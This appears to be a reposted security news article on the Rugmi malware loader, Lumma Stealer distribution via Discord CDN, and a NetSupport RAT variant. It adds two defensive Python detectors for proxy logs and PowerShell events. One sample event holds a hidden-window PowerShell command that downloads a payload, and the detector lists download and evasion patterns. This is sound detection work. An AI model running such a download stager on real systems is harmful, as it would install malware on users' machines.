Rugmi Malware Loader: Hundreds of Detections Every Day

admin · 2023-12-29 11:01:13 · 44 views · 3,759 characters · 12 min 31 s read

A new malware loader is being used by threat actors to deliver a wide range of information stealers such as Lumma Stealer (aka LummaC2), Vidar, RecordBreaker (aka Raccoon Stealer V2), and Rescoms.

Cybersecurity firm ESET is tracking the trojan under the name Win/TrojanDownloader.Rugmi.

"This malware is a loader with three types of components: a downloader that downloads an encrypted payload, a loader that runs the payload from internal resources, and another loader that runs the payload from an external file on the disk," the company said in its Threat Report H2 2023.

Telemetry data gathered by the company shows that detections of the Rugmi loader spiked in October and November 2023, surging from single-digit daily counts to hundreds per day.

Stealer malware is typically sold under a malware-as-a-service (MaaS) model to other threat actors on a subscription basis. Lumma Stealer, for instance, is advertised in underground forums for $250 a month. The most expensive plan costs $20,000, but it also gives the customers access to the source code and the right to sell it.

There is evidence to suggest that the codebase associated with Mars, Arkei, and Vidar stealers has been repurposed to create Lumma.

Besides continuously adapting its tactics to evade detection, the off-the-shelf tool is distributed through a variety of methods ranging from malvertising to fake browser updates to cracked installations of popular software such as VLC media player and OpenAI ChatGPT.

Another technique concerns the use of Discord's content delivery network (CDN) to host and propagate the malware, as revealed by Trend Micro in October 2023.

This entails leveraging a combination of random and compromised Discord accounts to send direct messages to prospective targets, offering them $10 or a Discord Nitro subscription in exchange for their assistance on a project.

Users who agree to the offer are then urged to download an executable file hosted on Discord CDN that masquerades as iMagic Inventory but, in reality, contains the Lumma Stealer payload.

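
The Discord CDN delivery described above leaves a simple trace at the network edge: an executable-type file fetched from a Discord attachment host. The script below is an added example for this article, not code from ESET, Trend Micro or the article's author. It assumes a space-separated proxy log format (timestamp, client, method, URL, status, bytes), the two Discord CDN host names, and the set of file extensions worth alerting on; the sample log lines are constructed, with a file name that mimics the iMagic Inventory lure.

```python
"""Flag executable downloads from Discord's CDN in web-proxy logs.

Added example for this article; it is not code from ESET, Trend Micro or
the article's author. Assumptions: the space-separated log format below,
the two Discord CDN host names, and the set of file extensions worth
alerting on.
"""
from dataclasses import dataclass
from urllib.parse import urlparse

# Host names Discord serves attachments from (assumption for this example).
DISCORD_CDN_HOSTS = {"cdn.discordapp.com", "media.discordapp.net"}

# File types that execute when double-clicked on Windows (assumed watch list).
EXECUTABLE_SUFFIXES = (".exe", ".msi", ".scr", ".bat", ".cmd", ".js", ".vbs", ".dll")

# Constructed sample log: "timestamp client method url status bytes".
# The file name mimics the iMagic Inventory lure; this is not real telemetry.
SAMPLE_PROXY_LOG = """\
2023-11-02T10:14:01Z 10.0.0.21 GET https://cdn.discordapp.com/attachments/1111/2222/screenshot.png 200 48211
2023-11-02T10:15:44Z 10.0.0.21 GET https://cdn.discordapp.com/attachments/1111/3333/iMagic_Inventory_Setup.exe 200 2048000
2023-11-02T10:16:02Z 10.0.0.35 GET https://example.com/updates/app.exe 200 1024
2023-11-02T10:17:30Z 10.0.0.21 GET https://media.discordapp.net/attachments/1111/4444/tool.exe?ex=1 403 0
"""


@dataclass
class Hit:
    timestamp: str
    client: str
    url: str
    completed: bool  # True when the proxy returned the file (HTTP 200)


def parse_line(line):
    """Split one log line into its fields; return None for malformed lines."""
    parts = line.split()
    if len(parts) != 6:
        return None
    ts, client, method, url, status, size = parts
    return ts, client, method, url, int(status), int(size)


def is_discord_cdn_executable(url):
    """True when the URL points at an executable-type file on a Discord CDN host."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    path = parsed.path.lower()  # query string excluded, so "tool.exe?ex=1" still matches
    return host in DISCORD_CDN_HOSTS and path.endswith(EXECUTABLE_SUFFIXES)


def find_hits(log_text):
    """Return every Discord-CDN executable download attempt, completed or blocked."""
    hits = []
    for line in log_text.splitlines():
        record = parse_line(line)
        if record is None:
            continue
        ts, client, _method, url, status, _size = record
        if is_discord_cdn_executable(url):
            hits.append(Hit(ts, client, url, completed=(status == 200)))
    return hits


if __name__ == "__main__":
    for hit in find_hits(SAMPLE_PROXY_LOG):
        state = "DOWNLOADED" if hit.completed else "blocked"
        print(f"{hit.timestamp} {hit.client} {state} {hit.url}")
```

Blocked attempts are reported alongside completed ones on purpose: a 403 still identifies the client that accepted the lure, which is the host to check for a second download path. The same predicate can be expressed as a SIEM query once the host and extension lists are agreed on.
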
"Ready-made malware solutions contribute to the proliferation of malicious campaigns because they make the malware available even to potentially less technically skilled threat actors," ESET said.

"Offering a broader range of functions then serves to render Lumma Stealer even more attractive as a product."

The disclosure coincides with McAfee Labs' report of a new variant of NetSupport RAT, a tool derived from the legitimate NetSupport Manager remote-administration software that initial access brokers have since used to gather information and perform additional actions on victims of interest.

"The infection begins with obfuscated JavaScript files, serving as the initial point of entry for the malware," McAfee said, adding it highlights the "evolving tactics employed by cybercriminals."

The execution of the JavaScript file advances the attack chain by running PowerShell commands to retrieve the remote control and stealer malware from an actor-controlled server. The campaign's primary targets include the U.S. and Canada.

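
The NetSupport chain just described, an obfuscated JavaScript file that launches PowerShell to fetch the payload, shows up in endpoint telemetry as a Windows Script Host process spawning PowerShell with download commands. The following scorer is an added example for this article, not McAfee's or the article's code. It assumes Sysmon-style JSON lines with UtcTime, ParentImage, Image and CommandLine fields, the indicator lists it defines, and an alert threshold of 4; the three sample events are constructed and use a documentation IP address.

```python
"""Score PowerShell process-creation events for script-host download chains.

Added example for this article; it is not McAfee's or the article's code.
Assumptions: Sysmon-style JSON lines with UtcTime/ParentImage/Image/CommandLine
fields, the indicator lists below, and the alert threshold of 4.
"""
import json
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}  # Windows Script Host binaries
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line fragments that fetch remote content (assumed watch list; regexes on lower-case text).
DOWNLOAD_INDICATORS = [
    r"invoke-webrequest", r"\biwr\b", r"invoke-restmethod", r"\birm\b",
    r"downloadstring", r"downloadfile", r"net\.webclient", r"start-bitstransfer",
]
# Flags and calls used to hide or unwrap a stager (assumed watch list).
EVASION_INDICATORS = [
    r"-nop\b", r"-noprofile", r"-w(indowstyle)?\s+hidden", r"-enc(odedcommand)?\b",
    r"-ep\s+bypass", r"-executionpolicy\s+bypass", r"frombase64string",
]

# Constructed sample events (not real telemetry); 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = r"""
{"UtcTime":"2023-11-02 10:15:44","ParentImage":"C:\\Windows\\System32\\wscript.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -nop -w hidden -ep bypass -c \"Invoke-WebRequest -Uri http://203.0.113.10/payload.zip -OutFile $env:TEMP\\p.zip\""}
{"UtcTime":"2023-11-02 10:20:10","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -File C:\\Scripts\\backup.ps1"}
{"UtcTime":"2023-11-02 10:25:31","ParentImage":"C:\\Windows\\System32\\cscript.exe","Image":"C:\\Program Files\\PowerShell\\7\\pwsh.exe","CommandLine":"pwsh.exe -Command Get-Date"}
"""


def basename(path):
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def load_events(jsonl_text):
    """Parse one JSON object per non-empty line."""
    return [json.loads(line) for line in jsonl_text.splitlines() if line.strip()]


def score_event(event):
    """Return (score, reasons) for a process-creation event; non-PowerShell images score 0.

    Weights: script-host parent 2, any download indicator 2, each evasion flag 1.
    """
    reasons = []
    score = 0
    if basename(event.get("Image", "")) not in POWERSHELL:
        return 0, reasons
    if basename(event.get("ParentImage", "")) in SCRIPT_HOSTS:
        score += 2
        reasons.append("powershell spawned by script host")
    cmd = event.get("CommandLine", "").lower()
    downloads = [p for p in DOWNLOAD_INDICATORS if re.search(p, cmd)]
    if downloads:
        score += 2
        reasons.append("download indicator(s): " + ", ".join(downloads))
    for pattern in EVASION_INDICATORS:
        if re.search(pattern, cmd):
            score += 1
            reasons.append("evasion flag: " + pattern)
    return score, reasons


def scan(jsonl_text, threshold=4):
    """Return findings for events whose score reaches the threshold."""
    findings = []
    for event in load_events(jsonl_text):
        score, reasons = score_event(event)
        if score >= threshold:
            findings.append({
                "time": event.get("UtcTime"),
                "score": score,
                "reasons": reasons,
                "command": event.get("CommandLine"),
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding['time']}] score={finding['score']} {finding['command']}")
        for reason in finding["reasons"]:
            print("   -", reason)
```

With the sample data only the first event crosses the threshold; the cscript-launched `Get-Date` scores 2 for its parent alone, which keeps administrative scripts below the alert line while still being visible if the threshold is lowered for hunting. Tune the weights against a week of your own telemetry before relying on the threshold.
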
Originally published on the WeChat official account 知机安全: Rugmi Malware Loader: Hundreds of Detections Every Day

Published by admin on 2023-12-29 11:01:13. When reposting, please keep the original link (CN-SEC Chinese site; thanks to the original author): http://cn-sec.com/archives/2347007.html
